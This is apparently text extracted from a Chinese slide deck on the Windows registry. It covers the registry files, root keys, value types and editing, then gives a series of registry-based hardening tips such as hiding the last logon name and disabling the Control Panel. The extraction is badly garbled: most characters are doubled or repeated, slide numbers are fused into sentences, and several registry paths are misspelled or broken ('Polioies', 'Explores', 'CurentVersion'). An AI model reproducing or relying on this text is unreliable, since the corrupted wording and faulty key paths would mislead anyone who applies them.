檔檔文文件件的的關關聯(lián)聯(lián)關關系系，，硬硬件件設設備備的的說說明明，，狀狀態(tài)態(tài)和和屬屬性性以以及及各各種種狀狀態(tài)態(tài)信信息息和和數數據據。。他他有有兩兩個個部部分分組組成成：：注注冊冊表表數數據據庫庫（（包包括括兩兩個個文文件件：：SYSTEM.DAT和和USER.DAT））和和注注冊冊表表編編輯輯器器。。SYSTEM.DAT是是用用來來保保存存微微機機的的系系統(tǒng)統(tǒng)信信息息，，如如安安裝裝的的硬硬件件和和設設備備驅驅動動程程序序的的有有關關信信息息USER.DAT是是用用來來保保持持每每個個用用戶戶特特有有的的信信息息，，如如桌桌面面設設置置，，墻墻紙紙和和窗窗口口顏顏色色設設置置等等。。他他們們的的自自備備份份文文件件為為SYSTEM.DAO和和。。注注冊冊表表編編輯輯器器則則是是來來對對注注冊冊表表進進行行各各種種編編輯輯工工作作。。57注冊表表的構構造系統(tǒng)對對注冊冊表預預定了了六個個主管管鍵字字：HKEY_CLASSES_ROOT：文文件擴擴展名名與應應用的的關聯(lián)聯(lián)及OLE信息息HKEY_USERS：用用戶根根據個個人愛愛好設設置的的信息息。HKEY_CURRENT_USER：當當前登登錄用用戶控控制面面板選選項和和桌面面等的的設置置，以以及映映射的的網絡絡驅動動器HKEY_LOCAL_MACHINE：：計算算機硬硬件與與應用用程序序信息息HKEY_DYN_DATA：：即插插即用用和系系統(tǒng)性性能的的動態(tài)態(tài)信息息HKEY_CURRENT_CONFIG：：計算算機硬硬件配配置信信息58注冊表表的構構造注冊表表中的的鍵值值項數數據注冊表表通過過鍵和和子鍵鍵來管管理各各種信信息。。但是是注冊冊表中中的所所有信信息都都是以以各種種形式式的鍵鍵值項項數據據保存存的。。在注注冊表表編輯輯器右右窗格格中顯顯示的的都是是鍵值值項數數據。。這些些鍵值值項數數據可可以分分為三三種類類型：：1.字字符串串值在注冊冊表中中，字字符串串值一一般用用來表表示文文件的的描述述和硬硬件的的標識識。通通常由由字母母和數數字組組成，，也可可以是是漢字字，最最大長長度不不能超超過255個字字符。。在本本例中中以"a"="***"表示示。59注冊表表的構構造2.二二進制制值在注冊冊表中中二進進制值值是沒沒有長長度限限制的的，可可以是是任意意字節(jié)節(jié)長。。在注注冊表表編輯輯器中中，二二進制制以十十六進進制的的方式式表示示。在在本站站中以以"a"=hex:01,00,00,00方方式表表示。。3.DWORD值DWORD值是是一個個32位(4個個字節(jié)節(jié))的的數值值。在在注冊冊表編編輯器器中也也是以以十六六進制制的方方式表表示。。在本本站中中以"a"=dword:00000001表表示。。60注冊表表的雙雙重入入口問問題在注冊冊表中中經常常出現現雙重重入口口（分分支）），例例如，，有一一些在在HKEY_CLASSES_ROOT中中的鍵鍵同樣樣會在在HKEY_LOCAL_MACHINE中出出現。。注冊冊表中中經常常出現現雙重重入口口（分分支）），例例如，，有一一些在在HKEY_CLASSES_ROOT中中的鍵鍵同樣樣會在在HKEY_LOCAL_MACHINE中出出現。。如如果這這些相相同的的分支支出現現在兩兩個不不同的的根鍵鍵中，，那么么，哪哪個根根鍵有有效呢呢?注注冊冊表的的子鍵鍵都有有嚴格格的組組織。。某些些相同同的信信息會會出現現在超超過一一個的的子鍵鍵中，，如果果您只只修改改了一一個子子鍵，，那么么該修修改是是否作作用于于系統(tǒng)統(tǒng)依賴賴于該該子鍵鍵的等等級。。一般般來說說，系系統(tǒng)信信息優(yōu)優(yōu)先于于用戶戶等級級。例例如，，一個個設置置項同同時出出現在在HKEY_LOCAL_MACHINE和HKEY_USER子鍵鍵中，，通常常由HKEY_LOCAL_MACHINE中中的數數據起起作用用。要要注意意的是是，這這種情情況只只發(fā)生生在您您直接接編輯輯注冊冊表時時。如如果您您從““控制制面板板”中中更改改系統(tǒng)統(tǒng)配置置，則則所有有出現現該設設置項項的地地方均均會發(fā)發(fā)生相相應的的改變變。61注冊表表的修修改一、直直接接修修改改注注冊冊表表的的基基本本方方法法對于于熟熟悉悉注注冊冊表表項項設設置置的的高高級級用用戶戶，如如果果使使用用控控制制面面板板和和策策略略文文件件不不能能達達到到目目的的，，也也就就只只能能采采用用這這種種最最直直接接、最最全全面面的的處處理理方方法法。。具具體體使使用用方方法法是是的的Regedit.exe(注注冊冊表表編編輯輯器器)到到本本地地硬硬盤盤上上運運行行，去去掉掉注注冊冊表表只只讀讀方方式式，，對對系系統(tǒng)統(tǒng)注注冊冊表表項項進進行行修修改改，完完成成后后應應存存盤盤退退出出。。下下次次系系統(tǒng)統(tǒng)啟啟動動時時，新新設設置置就就會會生生效效。。62注冊表表的修修改二、間間接接修修改改注注冊冊表表的的簡簡易易方方法法在注注冊冊表表文文本本文文件件的的首首行行必必須須用用命命令令字字符符串串““REGEDIT””，其其作作用用是是通通知知系系統(tǒng)統(tǒng)調調用用regedit來來完完成成注注冊冊信信息息的的合合并并工工作作。接接下下來來的的每每一一行行或或代代表表一一個個鍵鍵值值的的聲聲明明或或者者為為注注釋釋性性的的說說明明信信息息。。主鍵鍵及及其其默默認認鍵鍵值值的的聲聲明明格格式式為為：根鍵鍵\一一級級主主鍵鍵\二二級級主主鍵鍵\=默默認認鍵鍵值值63注冊表表的修修改三、備備份份注注冊冊表表的的方方法法不少少安安裝裝程程序序(或或你你自自己己直直接接處處理理)都都可可能能搞搞亂亂你你系系統(tǒng)統(tǒng)的的注注冊冊表表，從從而而引引發(fā)發(fā)不不測測，，所所以以我我們們應應該該定定期期地地備備份份user.dat和和system.dat文文件件。。但但目目前前的的資資源源管管理理器器(或或者者是是DOS來來)都都不不能能直直接接復復制制這這兩兩個個文文件件.64注冊表安全全實例1、讓用戶戶名不出現現在登錄框框中Win9x以上的操操作系統(tǒng)可可以對以前前用戶登錄錄的信息具具有記憶功功能，下次次重新啟動動計算機時時，我們會會在用戶名名欄中發(fā)現現上次用戶戶的登錄名名，這個信信息可能會會被一些非非法分子利利用，而給給用戶造成成威脅，為為此我們有有必要隱藏藏上機用戶戶登錄的名名字。設設置時，請請用鼠標依依次訪問鍵鍵值HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon，并并在右邊的的窗口中新新建字符串串"DontDisplayLastUserName",并把把該值設置置為"1"，設置完完后，重新新啟動計算算機就可以以隱藏上機機用戶登錄錄的名字。。65注冊表安全全實例2、抵御BackDoor的的破壞目前，網上上有許多流流行的黑客客程序，它它們可以對對整個計算算機系統(tǒng)造造成了極大大的安全威威脅，其中中有一個名名叫BackDoor的后門門程序，專專門揀系統(tǒng)統(tǒng)的漏洞進進行攻擊。。為防止這這種程序對對系統(tǒng)造成成破壞，我我們有必要要通過相應應的設置來來預防BackDoor對系系統(tǒng)的破壞壞。設置時時，在編輯輯器操作窗窗口中用鼠鼠標依次單單擊鍵值HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run，，如果在右右邊窗口中中如發(fā)現了了“Notepad”鍵值，，就將它刪刪除，這樣樣就能達到到預防的目目的了。66注冊表安全全實例3、不允許許使用“控控制面板””控制面板是是Windows系系統(tǒng)的控制制中心，可可以對設備備屬性，文文件系統(tǒng)，，安全口令令等很多系系統(tǒng)很關鍵鍵的東西進進行修改，，我們當然然需要防范范這些了。。在在隱藏藏和禁止使使用“控制制面板”時時，我們可可以在開始始菜單中的的運行欄中中輸入regedit命令，，打開注冊冊表編輯器器操作界面面，然后在在該界面中中，依次用用鼠標單擊擊\\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\鍵鍵值，并在在其中新建建DWORD值NoDispCPL，，把值修改改為1（十十六進制））就行了。。67注冊表安全全實例4、拒絕通通過網絡訪訪問軟盤為了防止病病毒入侵整整個網絡，，導致整個個網絡處于于癱瘓狀態(tài)態(tài)，所以我我們必須嚴嚴格管理計計算機的輸輸入設備，，以斷絕病病毒的源頭頭，為此就就要禁止通通過網絡訪訪問軟盤。。設置時，，首先單擊擊開始按鈕鈕，從彈出出的菜單中中選擇運行行命令；隨隨后，程序序將彈出一一個運行對對話框，在在該對話框框中輸入regedit命令令，然后在在打開的注注冊表編輯輯器中依次次打開鍵值值[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon]，在在右邊的窗窗口中看看看有沒有鍵鍵值AllocateFloppies，如果果沒有請創(chuàng)創(chuàng)建DWORD值，，名字取為為AllocateFloppies，把它的的值修改為為０或１，，其中0代代表可被域域內所有管管理員訪問問，1代表表僅可被當當地登陸者者訪問。68注冊表安全全實例5、讓“文文件系統(tǒng)””菜單在系系統(tǒng)屬性中中消失為了防止非非法用戶隨隨意篡改系系統(tǒng)中的文文件，我們們有必要把把“系統(tǒng)屬屬性”中““文件系統(tǒng)統(tǒng)”的菜單單隱藏起來來。隱藏時時，只要在在注冊表編編輯器中用用鼠標依次次打開HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System鍵值，，在右邊的的窗口中新新建一個DWORD串值：““NoFileSysPage”，然然后把它的的值改為““1”即可可。69注冊表安全全實例6、鎖定桌桌面桌面設置包包括壁紙、、圖標以及及快捷方式式，它們的的設置一般般都是我們們經過精心心選擇才設設定好的。。大多數情情況下，我我們不希望望他人隨意意修改桌面面設置或隨隨意刪除快快捷方式。。怎么辦?其實修改改注冊表可可以幫我們們鎖定桌面面，這里““鎖定”的的含義是對對他人的修修改不做儲儲存，不管管別人怎么么改，只要要重新啟動動計算機，，我們的設設置就會原原封不動地地出現在眼眼前。設置置時，運行行regedit進進入注冊表表編輯器，，找到如下下分支：Hkey－－Users\Software\Microsoft\Windows\CurentVersion\Polioies\Explores，并用鼠鼠標雙擊““NoSaveSetting””，并將其其鍵值從0改為1就就OK了??！70注冊表安全全實例7、禁用Regedit命令令注冊表對于于很多用戶戶來說是很很危險的，，尤其是初初學者，為為了安全，，最好還是是禁止注冊冊表編輯器器regedit.